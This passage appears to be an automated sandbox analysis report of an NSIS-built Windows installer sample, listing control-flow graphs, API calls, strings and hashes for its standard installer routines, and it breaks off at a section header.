12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00429A95,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                      • String ID: jF
                                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2195846720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195835580.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195859890.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195872823.000000000049F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2195970173.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_ton.jbxd
                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                      • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                                      • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                      • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                                      control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                                                                                                                                                                                                                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                                                                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401753
                                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 00401767
                                                                                                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                                                                                      Memory Dump Source
